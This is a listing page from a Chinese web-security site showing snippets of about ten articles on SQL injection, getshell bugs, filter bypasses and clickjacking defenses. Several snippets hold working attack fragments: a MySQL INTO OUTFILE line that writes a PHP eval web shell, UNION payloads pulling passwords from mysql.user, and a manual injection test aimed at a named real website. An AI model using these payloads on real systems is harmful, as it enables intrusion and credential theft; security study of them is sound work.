安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
逆向工程 ExploitS 系统文档 移动安全 硬件安全 无线安全WEB安全 DataBase 神兵利刃 网络安全 编程茶楼 WooYun
返回首页
当前位置: 安云网 > 技术关注 > WEB安全 >
  • [WEB安全] PHPCMS V9.6.2 SQL注入漏洞分析 日期::2018-08-23点击:228 好评:0

    作者: 0r3ak@0kee Team 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 传送门 【漏洞分析】PHPCMS V9.6.1 任意文件读取漏洞分析(含PoC,已有补丁) 前言 通过这篇文章的分析: http://bobao.360.cn/learning/detail/3805.html ,详细讲述...

  • [WEB安全] UEditor .net版本 getshell 日期::2018-08-22点击:142 好评:0

    发布时间:2018-08-03 公开时间:2018-08-21 漏洞类型:逻辑漏洞 危害等级:高 漏洞详情 https://github.com/fex-team/ueditor/blob/dev-1.5.0/net/App_Code/CrawlerHandler.cs Crawler方法对source[]的检查仅仅是一个ContentType if(response.ContentType.IndexOf(image)==-1){St...

  • [WEB安全] 点击劫持漏洞解决( Clickjacking: X-Frame-Options header missing) 日期::2018-08-20点击:198 好评:0

    X-Frame-Options HTTP 响应头, 可以指示浏览器是否应该加载一个 iframe 中的页面。 网站可以通过设置 X-Frame-Options 阻止站点内的页面被其他页面嵌入从而防止点击劫持 方法一:常见的比如使用js,判...

  • [WEB安全] Web服务器点击劫持(ClickJacking)的安全防范 日期::2018-08-09点击:170 好评:0

    一.介绍 ClickJacking即点击劫持,是一种将恶意代码经过处理使其变成透明、不可见的iframe,并将其覆盖在一个网页上,然后诱使用户在该网页上进行点击操作。通过改变iframe的在页面的位置,可以诱使用户正好点击我们设置好的透...

  • [WEB安全] mysql的outfile设置一句话 日期::2018-05-21点击:261 好评:0

    CreateTABLEa(cmdtextNOTNULL);InsertINTOa(cmd)VALUES(?phpeval($_POST[cmd]);?);selectcmdfromaintooutfileG:/xampp/phpmyadmin/phplogs.php;DropTABLEIFEXISTSa;flushlogs;...

  • [WEB安全] 解决DEDECMS历史难题--找后台目录 日期::2018-02-27点击:204 好评:0

    利用限制 仅针对windows系统 进入正题 首先看核心文件common.inc.php 大概148行左右 if($_FILES){require_once(DEDEINC./uploadsafe.inc.php);} uploadsafe.inc.php if(preg_match(#^(cfg_|GLOBALS)#,$_key)){exit(Requestvarnotallowforuploadsafe!);}$$_key=$_FILES[$_key][tmp_name];//获取t...

  • [WEB安全] 盲注学习总结 日期::2018-02-03点击:193 好评:0

    sql注入中的盲注的几种类型 1.基于时间延时注入 基于时间的手工盲注一般都是通过二分法或逐位法确定范围获取目标值。大大缩小了请求数。 通过控制,获取响应时间来判断目标值的正确性。使用大量情况,在纯盲情况下成功率...

  • [WEB安全] 一次简单的手工注入 日期::2018-02-03点击:213 好评:0

    手工SQL注入: 网址:http://battery.tcl.com/read_news.php?id=38 判断是否有注入点,通常是:单引号() and 1=1 and 1=2 http://battery.tcl.com/read_news.php?id=38 (错误) http://battery.tcl.com/read_news.php?id=38 and 1=1 (正确) http://battery.tcl.com/read_news.php?id=38...

  • [WEB安全] MYSQL注入绕过技巧 日期::2018-01-30点击:98 好评:0

    /lingdao.php?id=161.0ORDER BY%2B9 /lingdao.php?id=4.990Union(select-1.0,2,3,4,5,6,7,@@version) Article/show/id/4.0Union(select-0.1,2,USER,password,5,6,7,8,9,10,11,12,13.0FROM mysql%252euser) /lingdao.php?id=4.990Union(select-.1,password,3,4,5,6,7,8.0FROM(...

  • [WEB安全] MySQL注射的过滤绕过技巧 日期::2018-01-19点击:170 好评:2

    SQL注射的绕过技巧较多,此文仅做一些简单的总结。 前文已经提到,最好利用的注射点: 支持Union 可报错 支持多行执行、可执行系统命令、可HTTP Request等额外有利条件 若非以上类型,则可能需要暴力猜解。猜解时,可能会遇到一...

推荐内容